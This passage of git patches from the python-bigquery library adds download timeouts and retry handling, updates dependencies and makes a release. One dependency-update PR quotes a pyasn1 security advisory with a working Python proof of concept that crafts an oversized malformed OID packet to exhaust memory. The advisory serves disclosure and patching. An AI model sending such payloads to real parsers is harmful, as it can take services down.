tests/unit/test_table.py | 8 ++ 9 files changed, 214 insertions(+), 17 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 5460f7ca7..7bd9f99b6 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -33,6 +33,7 @@ from google.cloud.bigquery import _pyarrow_helpers from google.cloud.bigquery import _versions_helpers +from google.cloud.bigquery import retry as bq_retry from google.cloud.bigquery import schema @@ -740,7 +741,7 @@ def _row_iterator_page_to_arrow(page, column_names, arrow_types): return pyarrow.RecordBatch.from_arrays(arrays, names=column_names) -def download_arrow_row_iterator(pages, bq_schema): +def download_arrow_row_iterator(pages, bq_schema, timeout=None): """Use HTTP JSON RowIterator to construct an iterable of RecordBatches. Args: @@ -751,6 +752,10 @@ def download_arrow_row_iterator(pages, bq_schema): Mapping[str, Any] \ ]]): A decription of the fields in result pages. + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Yields: :class:`pyarrow.RecordBatch` The next page of records as a ``pyarrow`` record batch. @@ -759,8 +764,16 @@ def download_arrow_row_iterator(pages, bq_schema): column_names = bq_to_arrow_schema(bq_schema) or [field.name for field in bq_schema] arrow_types = [bq_to_arrow_data_type(field) for field in bq_schema] - for page in pages: - yield _row_iterator_page_to_arrow(page, column_names, arrow_types) + if timeout is None: + for page in pages: + yield _row_iterator_page_to_arrow(page, column_names, arrow_types) + else: + start_time = time.monotonic() + for page in pages: + if time.monotonic() - start_time > timeout: + raise concurrent.futures.TimeoutError() + + yield _row_iterator_page_to_arrow(page, column_names, arrow_types) def _row_iterator_page_to_dataframe(page, column_names, dtypes): @@ -778,7 +791,7 @@ def _row_iterator_page_to_dataframe(page, column_names, dtypes): return pandas.DataFrame(columns, columns=column_names) -def download_dataframe_row_iterator(pages, bq_schema, dtypes): +def download_dataframe_row_iterator(pages, bq_schema, dtypes, timeout=None): """Use HTTP JSON RowIterator to construct a DataFrame. Args: @@ -792,14 +805,27 @@ def download_dataframe_row_iterator(pages, bq_schema, dtypes): dtypes(Mapping[str, numpy.dtype]): The types of columns in result data to hint construction of the resulting DataFrame. Not all column types have to be specified. + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Yields: :class:`pandas.DataFrame` The next page of records as a ``pandas.DataFrame`` record batch. """ bq_schema = schema._to_schema_fields(bq_schema) column_names = [field.name for field in bq_schema] - for page in pages: - yield _row_iterator_page_to_dataframe(page, column_names, dtypes) + + if timeout is None: + for page in pages: + yield _row_iterator_page_to_dataframe(page, column_names, dtypes) + else: + start_time = time.monotonic() + for page in pages: + if time.monotonic() - start_time > timeout: + raise concurrent.futures.TimeoutError() + + yield _row_iterator_page_to_dataframe(page, column_names, dtypes) def _bqstorage_page_to_arrow(page): @@ -928,6 +954,7 @@ def _download_table_bqstorage( if "@" in table.table_id: raise ValueError("Reading from a specific snapshot is not currently supported.") + start_time = time.monotonic() requested_streams = determine_requested_streams(preserve_order, max_stream_count) requested_session = bigquery_storage.types.stream.ReadSession( @@ -944,10 +971,16 @@ def _download_table_bqstorage( ArrowSerializationOptions.CompressionCodec(1) ) + retry_policy = ( + bq_retry.DEFAULT_RETRY.with_deadline(timeout) if timeout is not None else None + ) + session = bqstorage_client.create_read_session( parent="projects/{}".format(project_id), read_session=requested_session, max_stream_count=requested_streams, + retry=retry_policy, + timeout=timeout, ) _LOGGER.debug( @@ -983,8 +1016,6 @@ def _download_table_bqstorage( # Manually manage the pool to control shutdown behavior on timeout. pool = concurrent.futures.ThreadPoolExecutor(max_workers=max(1, total_streams)) wait_on_shutdown = True - start_time = time.time() - try: # Manually submit jobs and wait for download to complete rather # than using pool.map because pool.map continues running in the @@ -1006,7 +1037,7 @@ def _download_table_bqstorage( while not_done: # Check for timeout if timeout is not None: - elapsed = time.time() - start_time + elapsed = time.monotonic() - start_time if elapsed > timeout: wait_on_shutdown = False raise concurrent.futures.TimeoutError( diff --git a/google/cloud/bigquery/dbapi/cursor.py b/google/cloud/bigquery/dbapi/cursor.py index 014a6825e..bffd7678f 100644 --- a/google/cloud/bigquery/dbapi/cursor.py +++ b/google/cloud/bigquery/dbapi/cursor.py @@ -323,6 +323,8 @@ def _bqstorage_fetch(self, bqstorage_client): read_session=requested_session, # a single stream only, as DB API is not well-suited for multithreading max_stream_count=1, + retry=None, + timeout=None, ) if not read_session.streams: diff --git a/google/cloud/bigquery/retry.py b/google/cloud/bigquery/retry.py index 19012efd6..6fd458df5 100644 --- a/google/cloud/bigquery/retry.py +++ b/google/cloud/bigquery/retry.py @@ -12,12 +12,15 @@ # See the License for the specific language governing permissions and # limitations under the License. +import logging + from google.api_core import exceptions from google.api_core import retry import google.api_core.future.polling from google.auth import exceptions as auth_exceptions # type: ignore import requests.exceptions +_LOGGER = logging.getLogger(__name__) _RETRYABLE_REASONS = frozenset( ["rateLimitExceeded", "backendError", "internalError", "badGateway"] @@ -61,14 +64,17 @@ def _should_retry(exc): """Predicate for determining when to retry. - We retry if and only if the 'reason' is 'backendError' - or 'rateLimitExceeded'. + We retry if and only if the 'reason' is in _RETRYABLE_REASONS or is + in _UNSTRUCTURED_RETRYABLE_TYPES. """ - if not hasattr(exc, "errors") or len(exc.errors) == 0: - # Check for unstructured error returns, e.g. from GFE + try: + reason = exc.errors[0]["reason"] + except (AttributeError, IndexError, TypeError, KeyError): + # Fallback for when errors attribute is missing, empty, or not a dict + # or doesn't contain "reason" (e.g. gRPC exceptions). + _LOGGER.debug("Inspecting unstructured error for retry: %r", exc) return isinstance(exc, _UNSTRUCTURED_RETRYABLE_TYPES) - reason = exc.errors[0]["reason"] return reason in _RETRYABLE_REASONS diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 195461006..88b673a8b 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -2152,7 +2152,10 @@ def to_arrow_iterable( timeout=timeout, ) tabledata_list_download = functools.partial( - _pandas_helpers.download_arrow_row_iterator, iter(self.pages), self.schema + _pandas_helpers.download_arrow_row_iterator, + iter(self.pages), + self.schema, + timeout=timeout, ) return self._to_page_iterable( bqstorage_download, @@ -2366,6 +2369,7 @@ def to_dataframe_iterable( iter(self.pages), self.schema, dtypes, + timeout=timeout, ) return self._to_page_iterable( bqstorage_download, diff --git a/tests/unit/job/test_query_pandas.py b/tests/unit/job/test_query_pandas.py index 4390309f1..e0e0438f5 100644 --- a/tests/unit/job/test_query_pandas.py +++ b/tests/unit/job/test_query_pandas.py @@ -179,6 +179,8 @@ def test_to_dataframe_bqstorage_preserve_order(query, table_read_options_kwarg): parent="projects/test-project", read_session=expected_session, max_stream_count=1, # Use a single stream to preserve row order. + retry=None, + timeout=None, ) @@ -593,6 +595,8 @@ def test_to_dataframe_bqstorage(table_read_options_kwarg): parent="projects/bqstorage-billing-project", read_session=expected_session, max_stream_count=0, # Use default number of streams for best performance. + retry=None, + timeout=None, ) bqstorage_client.read_rows.assert_called_once_with(stream_id) @@ -644,6 +648,8 @@ def test_to_dataframe_bqstorage_no_pyarrow_compression(): parent="projects/bqstorage-billing-project", read_session=expected_session, max_stream_count=0, + retry=None, + timeout=None, ) diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index a1cbb726b..6ec62c0b6 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -2252,3 +2252,134 @@ def fast_download_stream( results = list(result_gen) assert results == ["result_page"] + + +@pytest.mark.skipif(pandas is None, reason="Requires `pandas`") +@pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") +@pytest.mark.parametrize( + "sleep_time, timeout, should_timeout", + [ + (0.1, 0.05, True), # Timeout case + (0, 10.0, False), # Success case + ], +) +def test_download_arrow_row_iterator_with_timeout( + module_under_test, sleep_time, timeout, should_timeout +): + bq_schema = [schema.SchemaField("name", "STRING")] + + # Mock page with to_arrow method + mock_page = mock.Mock() + mock_page.to_arrow.return_value = pyarrow.RecordBatch.from_arrays( + [pyarrow.array(["foo"])], + names=["name"], + ) + mock_page.__iter__ = lambda self: iter(["row1"]) + mock_page._columns = [["foo"]] + + def pages_gen(): + # First page yields quickly + yield mock_page + if sleep_time > 0: + time.sleep(sleep_time) + yield mock_page + + iterator = module_under_test.download_arrow_row_iterator( + pages_gen(), bq_schema, timeout=timeout + ) + + # First item should always succeed + next(iterator) + + if should_timeout: + with pytest.raises(concurrent.futures.TimeoutError): + next(iterator) + else: + # Should succeed and complete + results = list(iterator) + assert len(results) == 1 # 1 remaining item + + +@pytest.mark.skipif(pandas is None, reason="Requires `pandas`") +@pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") +@pytest.mark.parametrize( + "sleep_time, timeout, should_timeout", + [ + (0.1, 0.05, True), # Timeout case + (0, 10.0, False), # Success case + ], +) +def test_download_dataframe_row_iterator_with_timeout( + module_under_test, sleep_time, timeout, should_timeout +): + bq_schema = [schema.SchemaField("name", "STRING")] + dtypes = {} + + # Mock page + mock_page = mock.Mock() + # Mock iterator for _row_iterator_page_to_dataframe checking next(iter(page)) + mock_page.__iter__ = lambda self: iter(["row1"]) + mock_page._columns = [["foo"]] + + def pages_gen(): + yield mock_page + if sleep_time > 0: + time.sleep(sleep_time) + yield mock_page + + iterator = module_under_test.download_dataframe_row_iterator( + pages_gen(), bq_schema, dtypes, timeout=timeout + ) + + next(iterator) + + if should_timeout: + with pytest.raises(concurrent.futures.TimeoutError): + next(iterator) + else: + results = list(iterator) + assert len(results) == 1 + + +@pytest.mark.skipif( + bigquery_storage is None, reason="Requires `google-cloud-bigquery-storage`" +) +def test_download_arrow_bqstorage_passes_timeout_to_create_read_session( + module_under_test, +): + # Mock dependencies + project_id = "test-project" + table = mock.Mock() + table.table_id = "test_table" + table.to_bqstorage.return_value = "projects/test/datasets/test/tables/test" + + bqstorage_client = mock.create_autospec( + bigquery_storage.BigQueryReadClient, instance=True + ) + # Mock create_read_session to return a session with no streams so the function returns early + # (Checking start of loop logic vs empty streams return) + session = mock.Mock() + # If streams is empty, _download_table_bqstorage returns early, which is fine for this test + session.streams = [] + bqstorage_client.create_read_session.return_value = session + + # Call the function + timeout = 123.456 + # download_arrow_bqstorage yields frames, so we need to iterate to trigger execution + list( + module_under_test.download_arrow_bqstorage( + project_id, table, bqstorage_client, timeout=timeout + ) + ) + + # Verify timeout and retry were passed + bqstorage_client.create_read_session.assert_called_once() + _, kwargs = bqstorage_client.create_read_session.call_args + assert "timeout" in kwargs + assert kwargs["timeout"] == timeout + + assert "retry" in kwargs + retry_policy = kwargs["retry"] + assert retry_policy is not None + # Check if deadline is set correctly in the retry policy + assert retry_policy._deadline == timeout diff --git a/tests/unit/test_client_retry.py b/tests/unit/test_client_retry.py index 6e49cc464..f0e7ac88f 100644 --- a/tests/unit/test_client_retry.py +++ b/tests/unit/test_client_retry.py @@ -23,6 +23,11 @@ PROJECT = "test-project" +# A deadline > 1.0s is required because the default retry (google.api_core.retry.Retry) +# has an initial delay of 1.0s. If the deadline is <= 1.0s, the first retry attempt +# (scheduled for now + 1.0s) will be rejected immediately as exceeding the deadline. +_RETRY_DEADLINE = 10.0 + def _make_credentials(): import google.auth.credentials @@ -83,7 +88,7 @@ def test_call_api_applying_custom_retry_on_timeout(global_time_lock): "api_request", side_effect=[TimeoutError, "result"], ) - retry = DEFAULT_RETRY.with_deadline(1).with_predicate( + retry = DEFAULT_RETRY.with_deadline(_RETRY_DEADLINE).with_predicate( lambda exc: isinstance(exc, TimeoutError) ) diff --git a/tests/unit/test_dbapi_cursor.py b/tests/unit/test_dbapi_cursor.py index 6fca4cec0..c5cad8c91 100644 --- a/tests/unit/test_dbapi_cursor.py +++ b/tests/unit/test_dbapi_cursor.py @@ -480,7 +480,11 @@ def fake_ensure_bqstorage_client(bqstorage_client=None, **kwargs): data_format=bigquery_storage.DataFormat.ARROW, ) mock_bqstorage_client.create_read_session.assert_called_once_with( - parent="projects/P", read_session=expected_session, max_stream_count=1 + parent="projects/P", + read_session=expected_session, + max_stream_count=1, + retry=None, + timeout=None, ) # Check the data returned. diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 97a1b4916..a8397247d 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -4125,6 +4125,10 @@ def test_to_dataframe_tqdm_error(self): # Warn that a progress bar was requested, but creating the tqdm # progress bar failed. for warning in warned: # pragma: NO COVER + # Pyparsing warnings appear to be coming from a transitive + # dependency and are unrelated to the code under test. + if "Pyparsing" in warning.category.__name__: + continue self.assertIn( warning.category, [UserWarning, DeprecationWarning, tqdm.TqdmExperimentalWarning], @@ -6853,6 +6857,8 @@ def test_to_arrow_iterable_w_bqstorage_max_stream_count(preserve_order): parent=mock.ANY, read_session=mock.ANY, max_stream_count=max_stream_count if not preserve_order else 1, + retry=None, + timeout=None, ) @@ -6888,4 +6894,6 @@ def test_to_dataframe_iterable_w_bqstorage_max_stream_count(preserve_order): parent=mock.ANY, read_session=mock.ANY, max_stream_count=max_stream_count if not preserve_order else 1, + retry=None, + timeout=None, ) From d5cc42b71726fef46715587df6379c325979667a Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 12 Feb 2026 15:18:49 +0000 Subject: [PATCH 5/7] chore(deps): update dependency geopandas to v1.1.2 [security] (#2411) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [geopandas](https://redirect.github.com/geopandas/geopandas) | `==1.1.1` → `==1.1.2` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/geopandas/1.1.2?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/geopandas/1.1.1/1.1.2?slim=true) | ### GitHub Vulnerability Alerts #### [CVE-2025-69662](https://nvd.nist.gov/vuln/detail/CVE-2025-69662) SQL injection vulnerability in geopandas before v.1.1.2 allows an attacker to obtain sensitive information via the to_postgis()` function being used to write GeoDataFrames to a PostgreSQL database. --- ### Release Notes
geopandas/geopandas (geopandas) ### [`v1.1.2`](https://redirect.github.com/geopandas/geopandas/blob/HEAD/CHANGELOG.md#Version-112-December-22-2025) [Compare Source](https://redirect.github.com/geopandas/geopandas/compare/v1.1.1...v1.1.2) Bug fixes: - Fix an issue that caused an error in `GeoDataFrame.from_features` when there is no `properties` field ([#​3599](https://redirect.github.com/geopandas/geopandas/issues/3599)). - Fix `read_file` and `to_file` errors ([#​3682](https://redirect.github.com/geopandas/geopandas/issues/3682)) - Fix `read_parquet` with `to_pandas_kwargs` for complex (list/struct) arrow types ([#​3640](https://redirect.github.com/geopandas/geopandas/issues/3640)) - `value_counts` on GeoSeries now preserves CRS in index ([#​3669](https://redirect.github.com/geopandas/geopandas/issues/3669)) - Fix f-string placeholders appearing in error messages when `pyogrio` cannot be imported ([#​3682](https://redirect.github.com/geopandas/geopandas/issues/3682)). - Fix `read_parquet` with `to_pandas_kwargs` for complex (list/struct) arrow types ([#​3640](https://redirect.github.com/geopandas/geopandas/issues/3640)). - `.to_json` now provides a clearer error message when called on a GeoDataFrame without an active geometry column ([#​3648](https://redirect.github.com/geopandas/geopandas/issues/3648)). - Calling `del gdf["geometry"]` now will downcast to a `pd.DataFrame` if there are no geometry columns left in the dataframe ([#​3648](https://redirect.github.com/geopandas/geopandas/issues/3648)). - Fix SQL injection in `to_postgis` via geometry column name ([#​3681](https://redirect.github.com/geopandas/geopandas/issues/3681)).
--- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery). --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index dd94deab6..ab8d6b6f9 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -10,7 +10,7 @@ db-dtypes==1.4.3 Fiona==1.10.1 geojson==3.2.0 geopandas===1.0.1; python_version <= '3.9' -geopandas==1.1.1; python_version >= '3.10' +geopandas==1.1.2; python_version >= '3.10' google-api-core==2.25.2 google-auth==2.41.1 google-cloud-bigquery==3.38.0 From 80ca3f5b6be483220cbefae1241c855de92690a0 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 12 Feb 2026 15:50:09 +0000 Subject: [PATCH 6/7] chore(deps): update dependency pyasn1 to v0.6.2 [security] (#2407) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [pyasn1](https://redirect.github.com/pyasn1/pyasn1) ([changelog](https://pyasn1.readthedocs.io/en/latest/changelog.html)) | `==0.6.1` → `==0.6.2` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/pyasn1/0.6.2?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/pyasn1/0.6.1/0.6.2?slim=true) | ### GitHub Vulnerability Alerts #### [CVE-2026-23490](https://redirect.github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq) ### Summary After reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets. ### Details The integer issue can be found in the decoder as `reloid += ((subId << 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496 ### PoC For the DoS: ```py import pyasn1.codec.ber.decoder as decoder import pyasn1.type.univ as univ import sys import resource # Deliberately set memory limit to display PoC try: resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024)) print("[*] Memory limit set to 100MB") except: print("[-] Could not set memory limit") # Test with different payload sizes to find the DoS threshold payload_size_mb = int(sys.argv[1]) print(f"[*] Testing with {payload_size_mb}MB payload...") payload_size = payload_size_mb * 1024 * 1024 # Create payload with continuation octets # Each 0x81 byte indicates continuation, causing bit shifting in decoder payload = b'\x81' * payload_size + b'\x00' length = len(payload) # DER length encoding (supports up to 4GB) if length < 128: length_bytes = bytes([length]) elif length < 256: length_bytes = b'\x81' + length.to_bytes(1, 'big') elif length < 256**2: length_bytes = b'\x82' + length.to_bytes(2, 'big') elif length < 256**3: length_bytes = b'\x83' + length.to_bytes(3, 'big') else: # 4 bytes can handle up to 4GB length_bytes = b'\x84' + length.to_bytes(4, 'big') # Use OID (0x06) for more aggressive parsing malicious_packet = b'\x06' + length_bytes + payload print(f"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB") try: print("[*] Decoding (this may take time or exhaust memory)...") result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier()) print(f'[+] Decoded successfully') print(f'[!] Object size: {sys.getsizeof(result[0])} bytes') # Try to convert to string print('[*] Converting to string...') try: str_result = str(result[0]) print(f'[+] String succeeded: {len(str_result)} chars') if len(str_result) > 10000: print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!') except MemoryError: print(f'[-] MemoryError during string conversion!') except Exception as e: print(f'[-] {type(e).__name__} during string conversion') except MemoryError: print('[-] MemoryError: Out of memory!') except Exception as e: print(f'[-] Error: {type(e).__name__}: {e}') print("\n[*] Test completed") ``` Screenshots with the results: #### DoS Screenshot_20251219_160840 Screenshot_20251219_152815 #### Leak analysis A potential heap leak was investigated but came back clean: ``` [*] Creating 1000KB payload... [*] Decoding with pyasn1... [*] Materializing to string... [+] Decoded 2157784 characters [+] Binary representation: 896001 bytes [+] Dumped to heap_dump.bin [*] First 64 bytes (hex): 01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081 [*] First 64 bytes (ASCII/hex dump): 0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02 ..... @​..... @​.. 0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08 ... @​..... @​.... 0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20 . @​..... @​..... 0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81 @​..... @​..... @​. [*] Digit distribution analysis: '0': 10.1% '1': 9.9% '2': 10.0% '3': 9.9% '4': 9.9% '5': 10.0% '6': 10.0% '7': 10.0% '8': 9.9% '9': 10.1% ``` ### Scenario 1. An attacker creates a malicious X.509 certificate. 2. The application validates certificates. 3. The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above. ### Impact This issue can affect resource consumption and hang systems or stop services. This may affect: - LDAP servers - TLS/SSL endpoints - OCSP responders - etc. ### Recommendation Add a limit to the allowed bytes in the decoder. --- ### Release Notes
pyasn1/pyasn1 (pyasn1) ### [`v0.6.2`](https://redirect.github.com/pyasn1/pyasn1/blob/HEAD/CHANGES.rst#Revision-062-released-16-01-2026) [Compare Source](https://redirect.github.com/pyasn1/pyasn1/compare/v0.6.1...v0.6.2) - CVE-2026-23490 (GHSA-63vm-454h-vhhq): Fixed continuation octet limits in OID/RELATIVE-OID decoder (thanks to tsigouris007) - Added support for Python 3.14 [pr #​97](https://redirect.github.com/pyasn1/pyasn1/pull/97) - Added SECURITY.md policy - Fixed unit tests failing due to missing code [issue #​91](https://redirect.github.com/pyasn1/pyasn1/issues/91) [pr #​92](https://redirect.github.com/pyasn1/pyasn1/pull/92) - Migrated to pyproject.toml packaging [pr #​90](https://redirect.github.com/pyasn1/pyasn1/pull/90)
--- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery). --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index ab8d6b6f9..5f4d686b3 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -27,7 +27,7 @@ packaging==25.0 pandas==2.3.3 proto-plus==1.26.1 pyarrow==21.0.0 -pyasn1==0.6.1 +pyasn1==0.6.2 pyasn1-modules==0.4.2 pycparser==2.23 pyparsing==3.2.5 From e8184fa38563b8e9aef265ec64836a931e9e89cd Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 12 Feb 2026 13:26:35 -0500 Subject: [PATCH 7/7] chore: librarian release pull request: 20260212T105312Z (#2415) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit PR created by the Librarian CLI to initialize a release. Merging this PR will auto trigger a release. Librarian Version: v0.8.0 Language Image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620
google-cloud-bigquery: 3.40.1 ## [3.40.1](https://togithub.com/googleapis/python-bigquery/compare/v3.40.0...v3.40.1) (2026-02-12) ### Bug Fixes * updates timeout/retry code to respect hanging server (#2408) ([24d45d0d](https://togithub.com/googleapis/python-bigquery/commit/24d45d0d)) * add timeout parameter to to_dataframe and to_arrow met… (#2354) ([4f67ba20](https://togithub.com/googleapis/python-bigquery/commit/4f67ba20)) ### Documentation * clarify that only jobs.query and jobs.getQueryResults are affec… (#2349) ([73228432](https://togithub.com/googleapis/python-bigquery/commit/73228432))
--- .librarian/state.yaml | 2 +- CHANGELOG.md | 13 +++++++++++++ google/cloud/bigquery/version.py | 2 +- 3 files changed, 15 insertions(+), 2 deletions(-) diff --git a/.librarian/state.yaml b/.librarian/state.yaml index 71bcf16ad..efce633f2 100644 --- a/.librarian/state.yaml +++ b/.librarian/state.yaml @@ -1,7 +1,7 @@ image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620 libraries: - id: google-cloud-bigquery - version: 3.40.0 + version: 3.40.1 last_generated_commit: "" apis: [] source_roots: diff --git a/CHANGELOG.md b/CHANGELOG.md index 242165933..083dbfc4f 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -4,6 +4,19 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.40.1](https://github.com/googleapis/google-cloud-python/compare/google-cloud-bigquery-v3.40.0...google-cloud-bigquery-v3.40.1) (2026-02-12) + + +### Documentation + +* clarify that only jobs.query and jobs.getQueryResults are affec… (#2349) ([73228432a3c821db05d898ea4a4788adf15b033d](https://github.com/googleapis/google-cloud-python/commit/73228432a3c821db05d898ea4a4788adf15b033d)) + + +### Bug Fixes + +* updates timeout/retry code to respect hanging server (#2408) ([24d45d0d5bf89762f253ba6bd6fdbee9d5993422](https://github.com/googleapis/google-cloud-python/commit/24d45d0d5bf89762f253ba6bd6fdbee9d5993422)) +* add timeout parameter to to_dataframe and to_arrow met… (#2354) ([4f67ba20b49159e81f645ed98e401b9bb1359c1a](https://github.com/googleapis/google-cloud-python/commit/4f67ba20b49159e81f645ed98e401b9bb1359c1a)) + ## [3.40.0](https://github.com/googleapis/google-cloud-python/compare/google-cloud-bigquery-v3.39.0...google-cloud-bigquery-v3.40.0) (2026-01-08) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 6b0fa0fba..2519009bf 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.40.0" +__version__ = "3.40.1"